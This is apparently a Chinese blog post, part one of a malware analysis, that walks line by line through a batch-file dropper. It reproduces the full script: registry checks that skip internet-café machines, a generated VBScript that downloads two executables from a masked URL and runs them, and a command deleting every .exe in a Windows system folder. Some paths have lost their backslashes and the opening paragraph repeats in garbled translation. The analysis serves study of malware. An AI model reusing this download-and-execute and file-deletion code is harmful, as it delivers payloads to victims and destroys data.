摘要:
我以前没学过蝙蝠,所以我可以通过分析学一点。分析过程可能有点冗长。@echoff在这里关闭echo。病毒通常是秘密执行的。然后,使用setlocalenabledelayedexpansion来设置本地变量延迟,这里具体使用:https://www.jb51.net/article/29323.htm@echooff&;设置localenabledelayeddexpansion这里的三个命令是
之前没学过bat,这里借分析顺便学一波,分析过程可能有点啰嗦
这里的@echo off关闭回显,病毒一般都是隐秘的执行的,然后setlocal enabledelayedexpansion是设置本地变量延迟,具体作用在这里:https://www.jb51.net/article/29323.htm
@echo off&setlocal enabledelayedexpansion
这里的三个命令都是查找计算机里的超级用户,/v表示查询注册表值,>nul 2>nul表示无论执行成功还是失败都不显示结果。然后如果找到了注册表里的值(存在某个超级用户),就跳转到相关的地方继续执行。
reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSetiCafe8 /v Admin>nul 2>nul&&call :is_admin_icafe reg query HKEY_LOCAL_MACHINESOFTWAREEYOOCLIENTSTATUS /v SuperLogin>nul 2>nul&&call :is_admin_eyoo reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSet /v superadmin>nul 2>nul&&call :is_admin_yungengxin
这里就跳到了各个标志处继续执行,目的都是一样,其中/f是解析文本,读字符串用;"delims="以空格定界符号,%IsAdmin:~-1%是提取IsAmin的最后一个字符。三个语句都是检测是否存在超级用户,是就执行goto superadmin,执行结束,否则就执行goto :eof,等待其他输入。这里有个很奇怪的是,我去搜索了一下,一般都是网吧的管理系统才会有这个超级管理员的注册表值,这个病毒为什么自动躲避网吧????
:is_admin_icafe for /f "delims=" %%a in ('reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSeticafe8 /v Admin') do (set IsAdmin=%%a) if %IsAdmin:~-1% == 1 (goto superadmin) goto :eof :is_admin_eyoo for /f "delims=" %%a in ('reg query HKEY_LOCAL_MACHINESOFTWAREEYOOCLIENTSTATUS /v SuperLogin') do (set IsAdmin=%%a) if %IsAdmin:~-1% == 1 (goto superadmin) goto :eof :is_admin_yungengxin for /f "delims=" %%a in ('reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSet /v superadmin') do (set IsAdmin=%%a) if %IsAdmin:~-1% == 1 (goto superadmin) goto :eof :superadmin exit
这里是下载两个exe到c盘下(网址抹掉了),然后删除c:windowssystem下所有的exe,/q取消删除确认,然后执行结束
::Download one or more programs and run the programs call :geticon http://xxxx/xx/zc005.exe C:Windowssystemzc005.exe call :geticon http://xxxx/xx/zjzc6.exe C:Windowssystemzjzc6.exe del c:windowssystem*.exe /q exit
我们看一下下载文件的地方,就是在temp临时目录生成一个vbs文件
:geticon url path echo strFileURL="%1">%temp%boot.vbs echo strHDLocation="%2">>%temp%boot.vbs echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>>%temp%boot.vbs echo objXMLHTTP.open "GET", strFileURL, false>>%temp%boot.vbs echo objXMLHTTP.send()>>%temp%boot.vbs echo If objXMLHTTP.Status=200 Then>>%temp%boot.vbs echo Set objADOStream=CreateObject("ADODB.Stream")>>%temp%boot.vbs echo objADOStream.Open>>%temp%boot.vbs echo objADOStream.Type^=^1>>%temp%boot.vbs echo objADOStream.Write objXMLHTTP.ResponseBody>>%temp%boot.vbs echo objADOStream.Position^=^0>>%temp%boot.vbs echo Set objFSO=Createobject("Scripting.FileSystemObject")>>%temp%boot.vbs echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation>>%temp%boot.vbs echo Set objFSO=Nothing>>%temp%boot.vbs echo objADOStream.SaveToFile strHDLocation>>%temp%boot.vbs echo objADOStream.Close>>%temp%boot.vbs echo Set objADOStream=Nothing>>%temp%boot.vbs echo End if>>%temp%boot.vbs echo Set objXMLHTTP=Nothing>>%temp%boot.vbs cscript //nologo //e:vbscript %temp%/boot.vbs del %temp%oot.vbs /q if exist %2 start "" %2 goto :eof
这里就是vbs执行的流程
strFileURL=http://xxxx/xx/zc005.exe '目标URL strHDLocation=C:Windowssystemzc005.exe '存放地址 Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP") '创建一个MSXML2.XMLHTTP对象用来抓取网页数据 objXMLHTTP.open "GET", strFileURL, false 'get方式访问url获取响应信息 objXMLHTTP.send() If objXMLHTTP.Status=200 Then '判断是否访问到页面 Set objADOStream=CreateObject("ADODB.Stream") 'ADODB.Stream用来数据传输 objADOStream.Open objADOStream.Type^=^1 '以二进制形式读取文件 objADOStream.Write objXMLHTTP.ResponseBody '数据写入对象,.ResponseBody:表示可以返回HTTP响应的几种形式之一 objADOStream.Position^=^0 '指示开始读取的位置 Set objFSO=Createobject("Scripting.FileSystemObject") '创建Scripting.FileSystemObject If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation '检测是否存在目标目录,存在就删除文件 Set objFSO=Nothing objADOStream.SaveToFile strHDLocation '写入到目标路径 objADOStream.Close Set objADOStream=Nothing End if Set objXMLHTTP=Nothing
最后这里就是用cscript执行脚本下载那两个exe下来,然后删除vbs脚本,最后再检测到目标文件就运行exe
cscript //nologo //e:vbscript %temp%/boot.vbs del %temp%oot.vbs /q if exist %2 start "" %2 goto :eof
这就是那两个exe,不过目标网站已经被封了,这里感谢大佬发的样品,我们会在part2分析那两个exe
